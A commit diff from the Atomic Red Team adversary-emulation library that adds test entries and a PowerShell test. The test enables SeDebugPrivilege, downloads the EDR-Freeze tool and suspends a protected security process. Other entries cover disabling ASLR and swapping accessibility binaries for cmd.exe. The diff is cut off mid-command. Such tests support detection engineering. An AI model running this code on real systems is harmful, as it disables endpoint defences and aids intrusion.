fix elevation_required

Bump actions/stale from 9 to 10 (#3178 )
Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com> Co-authored-by: Hare Sudhan <code@0x6c.dev>
2025-10-04 14:15:01 -04:00 · 2025-10-04 14:10:30 -04:00 · 2025-10-04 18:08:25 +00:00 · 2025-10-04 14:07:20 -04:00 · 2025-10-04 18:02:43 +00:00 · 2025-10-04 14:01:27 -04:00
31 changed files with 1109 additions and 152 deletions
@@ -7,7 +7,7 @@ jobs:
  stale:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/stale@v9
+      - uses: actions/stale@v10
        with:
          stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
          stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.'
@@ -2,7 +2,7 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1739-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1744-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)


 Atomic Red Team™ is a library of tests mapped to the
@@ -539,6 +539,8 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,54,Disable Ev
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,55,Disable EventLog-Application Auto Logger Session Via Registry - PowerShell,da86f239-9bd3-4e85-92ed-4a94ef111a1c,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,56,Disable EventLog-Application ETW Provider Via Registry - Cmd,1cac9b54-810e-495c-8aac-989e0076583b,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,57,Disable EventLog-Application ETW Provider Via Registry - PowerShell,8f907648-1ebf-4276-b0f0-e2678ca474f0,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,58,Freeze PPL-protected process with EDR-Freeze,cbb2573a-a6ad-4c87-aef8-6e175598559b,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,59,Disable ASLR Via sysctl parameters - Linux,ac333fe1-ce2b-400b-a117-538634427439,bash
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
@@ -825,6 +827,7 @@ privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
+privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
@@ -1304,6 +1307,7 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,6,Replac
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
+persistence,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
 persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
@@ -2025,6 +2029,7 @@ discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery
 discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
 discovery,T1083,File and Directory Discovery,6,Launch DirLister Executable,c5bec457-43c9-4a18-9a24-fe151d8971b7,powershell
 discovery,T1083,File and Directory Discovery,7,ESXi - Enumerate VMDKs available on an ESXi Host,4a233a40-caf7-4cf1-890a-c6331bbc72cf,command_prompt
+discovery,T1083,File and Directory Discovery,8,Identifying Network Shares - Linux,361fe49d-0c19-46ec-a483-ccb92d38e88e,sh
 discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
 discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
 discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
@@ -2151,6 +2156,7 @@ impact,T1489,Service Stop,4,Linux - Stop service using systemctl,42e3a5bd-1e45-4
 impact,T1489,Service Stop,5,Linux - Stop service by killing process using killall,e5d95be6-02ee-4ff1-aebe-cf86013b6189,sh
 impact,T1489,Service Stop,6,Linux - Stop service by killing process using kill,332f4c76-7e96-41a6-8cc2-7361c49db8be,sh
 impact,T1489,Service Stop,7,Linux - Stop service by killing process using pkill,08b4718f-a8bf-4bb5-a552-294fc5178fea,sh
+impact,T1489,Service Stop,8,Abuse of linux magic system request key for Send a SIGTERM to all processes,6e76f56f-2373-4a6c-a63f-98b7b72761f1,bash
 impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
 impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
 impact,T1491.001,Defacement: Internal Defacement,3,ESXi - Change Welcome Message on Direct Console User Interface (DCUI),30905f21-34f3-4504-8b4c-f7a5e314b810,command_prompt
@@ -125,6 +125,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagg
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,47,Tamper with Defender ATP on Linux/MacOS,40074085-dbc8-492b-90a3-11bcfc52fda8,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,50,ESXi - Disable Account Lockout Policy via PowerCLI,091a6290-cd29-41cb-81ea-b12f133c66cb,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,59,Disable ASLR Via sysctl parameters - Linux,ac333fe1-ce2b-400b-a117-538634427439,bash
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
 defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as FreeBSD or Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
 defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
@@ -367,6 +368,7 @@ discovery,T1217,Browser Bookmark Discovery,4,List Google Chromium Bookmark JSON
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
 discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
 discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
+discovery,T1083,File and Directory Discovery,8,Identifying Network Shares - Linux,361fe49d-0c19-46ec-a483-ccb92d38e88e,sh
 discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
@@ -425,6 +427,7 @@ impact,T1489,Service Stop,4,Linux - Stop service using systemctl,42e3a5bd-1e45-4
 impact,T1489,Service Stop,5,Linux - Stop service by killing process using killall,e5d95be6-02ee-4ff1-aebe-cf86013b6189,sh
 impact,T1489,Service Stop,6,Linux - Stop service by killing process using kill,332f4c76-7e96-41a6-8cc2-7361c49db8be,sh
 impact,T1489,Service Stop,7,Linux - Stop service by killing process using pkill,08b4718f-a8bf-4bb5-a552-294fc5178fea,sh
+impact,T1489,Service Stop,8,Abuse of linux magic system request key for Send a SIGTERM to all processes,6e76f56f-2373-4a6c-a63f-98b7b72761f1,bash
 impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
 impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (FreeBSD/Linux),7b8ce084-3922-4618-8d22-95f996173765,sh
 impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (FreeBSD/Linux),53e6735a-4727-44cc-b35b-237682a151ad,sh
@@ -380,6 +380,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,54,Disable Ev
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,55,Disable EventLog-Application Auto Logger Session Via Registry - PowerShell,da86f239-9bd3-4e85-92ed-4a94ef111a1c,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,56,Disable EventLog-Application ETW Provider Via Registry - Cmd,1cac9b54-810e-495c-8aac-989e0076583b,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,57,Disable EventLog-Application ETW Provider Via Registry - PowerShell,8f907648-1ebf-4276-b0f0-e2678ca474f0,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,58,Freeze PPL-protected process with EDR-Freeze,cbb2573a-a6ad-4c87-aef8-6e175598559b,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
@@ -578,6 +579,7 @@ privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
+privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
@@ -934,6 +936,7 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,6,Replac
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,7,Replace Magnify.exe (Magnifier binary) with cmd.exe,5e4fa70d-c789-470e-85e1-6992b92bb321,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,8,Replace Narrator.exe (Narrator binary) with cmd.exe,2002f5ea-cd13-4c82-bf73-e46722e5dc5e,command_prompt
 persistence,T1546.008,Event Triggered Execution: Accessibility Features,9,Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe,825ba8ca-71cc-436b-b1dd-ea0d5e109086,command_prompt
+persistence,T1546.008,Event Triggered Execution: Accessibility Features,10,Replace AtBroker.exe (App Switcher binary) with cmd.exe,210be7ea-d841-40ec-b3e1-ff610bb62744,command_prompt
 persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
@@ -671,6 +671,8 @@
  - Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell [windows]
  - Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd [windows]
  - Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell [windows]
+  - Atomic Test #58: Freeze PPL-protected process with EDR-Freeze [windows]
+  - Atomic Test #59: Disable ASLR Via sysctl parameters - Linux [linux]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1087,6 +1089,7 @@
  - Atomic Test #7: Replace Magnify.exe (Magnifier binary) with cmd.exe [windows]
  - Atomic Test #8: Replace Narrator.exe (Narrator binary) with cmd.exe [windows]
  - Atomic Test #9: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe [windows]
+  - Atomic Test #10: Replace AtBroker.exe (App Switcher binary) with cmd.exe [windows]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
  - Atomic Test #1: Process Injection via C# [windows]
  - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
@@ -1729,6 +1732,7 @@
  - Atomic Test #7: Replace Magnify.exe (Magnifier binary) with cmd.exe [windows]
  - Atomic Test #8: Replace Narrator.exe (Narrator binary) with cmd.exe [windows]
  - Atomic Test #9: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe [windows]
+  - Atomic Test #10: Replace AtBroker.exe (App Switcher binary) with cmd.exe [windows]
 - [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
  - Atomic Test #1: Create a new Windows domain admin user [windows]
  - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
@@ -2731,6 +2735,7 @@
  - Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
  - Atomic Test #6: Launch DirLister Executable [windows]
  - Atomic Test #7: ESXi - Enumerate VMDKs available on an ESXi Host [windows]
+  - Atomic Test #8: Identifying Network Shares - Linux [linux]
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
  - Atomic Test #1: System Network Connections Discovery [windows]
  - Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
@@ -2984,6 +2989,7 @@
  - Atomic Test #5: Linux - Stop service by killing process using killall [linux]
  - Atomic Test #6: Linux - Stop service by killing process using kill [linux]
  - Atomic Test #7: Linux - Stop service by killing process using pkill [linux]
+  - Atomic Test #8: Abuse of linux magic system request key for Send a SIGTERM to all processes [linux]
 - T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -182,6 +182,7 @@
  - Atomic Test #43: Disable Memory Swap [linux]
  - Atomic Test #47: Tamper with Defender ATP on Linux/MacOS [linux, macos]
  - Atomic Test #50: ESXi - Disable Account Lockout Policy via PowerCLI [linux]
+  - Atomic Test #59: Disable ASLR Via sysctl parameters - Linux [linux]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -777,6 +778,7 @@
 - [T1083 File and Directory Discovery](../../T1083/T1083.md)
  - Atomic Test #3: Nix File and Directory Discovery [linux, macos]
  - Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
+  - Atomic Test #8: Identifying Network Shares - Linux [linux]
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
  - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -832,6 +834,7 @@
  - Atomic Test #5: Linux - Stop service by killing process using killall [linux]
  - Atomic Test #6: Linux - Stop service by killing process using kill [linux]
  - Atomic Test #7: Linux - Stop service by killing process using pkill [linux]
+  - Atomic Test #8: Abuse of linux magic system request key for Send a SIGTERM to all processes [linux]
 - T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -483,6 +483,7 @@
  - Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell [windows]
  - Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd [windows]
  - Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell [windows]
+  - Atomic Test #58: Freeze PPL-protected process with EDR-Freeze [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -778,6 +779,7 @@
  - Atomic Test #7: Replace Magnify.exe (Magnifier binary) with cmd.exe [windows]
  - Atomic Test #8: Replace Narrator.exe (Narrator binary) with cmd.exe [windows]
  - Atomic Test #9: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe [windows]
+  - Atomic Test #10: Replace AtBroker.exe (App Switcher binary) with cmd.exe [windows]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
  - Atomic Test #1: Process Injection via C# [windows]
  - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
@@ -1246,6 +1248,7 @@
  - Atomic Test #7: Replace Magnify.exe (Magnifier binary) with cmd.exe [windows]
  - Atomic Test #8: Replace Narrator.exe (Narrator binary) with cmd.exe [windows]
  - Atomic Test #9: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe [windows]
+  - Atomic Test #10: Replace AtBroker.exe (App Switcher binary) with cmd.exe [windows]
 - [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
  - Atomic Test #1: Create a new Windows domain admin user [windows]
  - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
@@ -12171,9 +12171,9 @@ defense-evasion:
        command: |
          aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
          echo "*** Log Group Created ***"
-          aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+          aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
          echo "*** Log Stream Created ***"
-          aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+          aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
          echo "*** Log Stream Deleted ***"
          aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
          echo "*** Log Group Deleted ***"
@@ -23615,6 +23615,127 @@ defense-evasion:
          -Name Enabled -Value 1 -PropertyType "DWord" -Force
        name: powershell
        elevation_required: true
+    - name: Freeze PPL-protected process with EDR-Freeze
+      auto_generated_guid: cbb2573a-a6ad-4c87-aef8-6e175598559b
+      description: This test utilizes the tool EDR-Freeze, which leverages the native
+        Microsoft binary WerFaultSecure.exe to suspend processes protected by the
+        Protected Process Light mechanism. PPL is a Windows security feature designed
+        to safeguard critical system processes — such as those related to antivirus,
+        credential protection, and system integrity — from tampering or inspection.
+        These processes operate in a restricted environment that prevents access even
+        from administrators or debugging tools, unless the accessing tool is signed
+        and trusted by Microsoft. By using WerFaultSecure.exe, which is inherently
+        trusted by the operating system, EDR-Freeze is able to bypass these restrictions
+        and temporarily freeze PPL-protected processes for analysis or testing purposes.
+      supported_platforms:
+      - windows
+      input_arguments:
+        processName:
+          type: string
+          default: SecurityHealthService
+          description: PPL-protected process name to target
+      executor:
+        command: "# Enable SeDebugPrivilege\nAdd-Type -TypeDefinition @\"\nusing System;\nusing
+          System.Runtime.InteropServices;\n\npublic class TokenAdjuster {\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool OpenProcessToken(IntPtr
+          ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);\n\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool LookupPrivilegeValue(string
+          lpSystemName, string lpName, out long lpLuid);\n\n    [DllImport(\"advapi32.dll\",
+          SetLastError = true)]\n    public static extern bool AdjustTokenPrivileges(IntPtr
+          TokenHandle, bool DisableAllPrivileges,\n        ref TOKEN_PRIVILEGES NewState,
+          uint BufferLength, IntPtr PreviousState, IntPtr ReturnLength);\n\n    [StructLayout(LayoutKind.Sequential,
+          Pack = 1)]\n    public struct TOKEN_PRIVILEGES {\n        public int PrivilegeCount;\n
+          \       public long Luid;\n        public int Attributes;\n    }\n\n    public
+          const int SE_PRIVILEGE_ENABLED = 0x00000002;\n    public const uint TOKEN_ADJUST_PRIVILEGES
+          = 0x0020;\n    public const uint TOKEN_QUERY = 0x0008;\n\n    public static
+          bool EnableSeDebugPrivilege() {\n        IntPtr hToken;\n        if (!OpenProcessToken(System.Diagnostics.Process.GetCurrentProcess().Handle,
+          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out hToken))\n            return
+          false;\n\n        long luid;\n        if (!LookupPrivilegeValue(null, \"SeDebugPrivilege\",
+          out luid))\n            return false;\n\n        TOKEN_PRIVILEGES tp = new
+          TOKEN_PRIVILEGES();\n        tp.PrivilegeCount = 1;\n        tp.Luid = luid;\n
+          \       tp.Attributes = SE_PRIVILEGE_ENABLED;\n\n        return AdjustTokenPrivileges(hToken,
+          false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);\n    }\n}\n\"@\n\n$result =
+          [TokenAdjuster]::EnableSeDebugPrivilege()\nif ($result) {\n    Write-Host
+          \"SeDebugPrivilege enabled successfully.\" -ForegroundColor Green\n} else
+          {\n    Write-Host \"Failed to enable SeDebugPrivilege.\" -ForegroundColor
+          Red\n    exit 1\n}\n\n# Get basic process info\n$process = Get-Process -Name
+          $#{processName} -ErrorAction Stop\n$processName = $process.ProcessName\nWrite-Host
+          \"Process Name: $processName)\"\nWrite-Host \"PID: $($process.Id)\"\n        \n#
+          Get executable path and user info\n$query = \"SELECT * FROM Win32_Process
+          WHERE Name = '$processName.exe'\"\n$wmiProcess = Get-WmiObject -Query $query\n\n$owner
+          = $wmiProcess.GetOwner()\n    Write-Host \"User: $($owner.Domain)\\$($owner.User)\"\n\n\n#
+          Get the folder of the current script\n$scriptFolder = Split-Path -Parent
+          $MyInvocation.MyCommand.Definition\n\n# Download latest EDR-Freeze package
+          and extract (force replace)\n$downloadUrl = \"https://github.com/TwoSevenOneT/EDR-Freeze/releases/download/main/EDR-Freeze_1.0.zip\"\n$zipPath
+          = Join-Path $scriptFolder \"EDR-Freeze_1.0.zip\"\nWrite-Host \"Downloading
+          latest EDR-Freeze from $downloadUrl\" -ForegroundColor Cyan\ntry {\n    Invoke-WebRequest
+          -Uri $downloadUrl -OutFile $zipPath -UseBasicParsing -ErrorAction Stop\n
+          \   Write-Host \"Download completed: $zipPath\" -ForegroundColor Green\n
+          \   $extractFolder = $scriptFolder\n    if (Test-Path $zipPath) {\n        Write-Host
+          \"Extracting archive to $extractFolder (overwriting existing files)\" -ForegroundColor
+          Cyan\n        if (Test-Path $extractFolder) {\n            # Ensure target
+          exe not locked; attempt to stop any running instance silently\n            Get-Process
+          -Name \"EDR-Freeze_1.0\" -ErrorAction SilentlyContinue | Stop-Process -Force
+          -ErrorAction SilentlyContinue\n        }\n        Add-Type -AssemblyName
+          System.IO.Compression.FileSystem 2>$null\n        # Custom extraction routine
+          (overwrite existing) compatible with .NET Framework (no bool overwrite overload)\n
+          \       $archive = $null\n        try {\n            $archive = [System.IO.Compression.ZipFile]::OpenRead($zipPath)\n
+          \           foreach ($entry in $archive.Entries) {\n                if ([string]::IsNullOrWhiteSpace($entry.FullName))
+          { continue }\n                if ($entry.FullName.EndsWith('/')) { # directory
+          entry\n                    $dirPath = Join-Path $extractFolder $entry.FullName\n
+          \                   if (-not (Test-Path $dirPath)) { New-Item -ItemType
+          Directory -Path $dirPath -Force | Out-Null }\n                    continue\n
+          \               }\n                $destPath = Join-Path $extractFolder
+          $entry.FullName\n                $destDir = Split-Path $destPath -Parent\n
+          \               if (-not (Test-Path $destDir)) { New-Item -ItemType Directory
+          -Path $destDir -Force | Out-Null }\n                if (Test-Path $destPath)
+          { Remove-Item -Path $destPath -Force -ErrorAction SilentlyContinue }\n                try
+          {\n                    # Use static extension method (PowerShell 5.1 compatible)\n
+          \                   [System.IO.Compression.ZipFileExtensions]::ExtractToFile($entry,
+          $destPath, $false)\n                } catch {\n                    Write-Host
+          \"Failed to extract entry $($entry.FullName): $_\" -ForegroundColor Yellow\n
+          \               }\n            }\n            Write-Host \"Extraction completed.\"
+          -ForegroundColor Green\n        } finally {\n            if ($archive) {
+          $archive.Dispose() }\n        }\n    }\n} catch {\n    Write-Host \"Failed
+          to download or extract EDR-Freeze: $_\" -ForegroundColor Red\n}\n\n# Wait
+          15s before putting targeted process before putting it in the comma\nWrite-Host
+          \"Waiting 15s before putting $processName in the comma\" -ForegroundColor
+          Yellow\nStart-Sleep -Seconds 5\nWrite-Host \"Waiting 10s before putting
+          $processName in the comma\" -ForegroundColor Yellow\nStart-Sleep -Seconds
+          5\nWrite-Host \"Waiting 5s before putting $processName in the comma\" -ForegroundColor
+          Yellow\nStart-Sleep -Seconds 3\nWrite-Host \"Waiting 2s before putting $processName
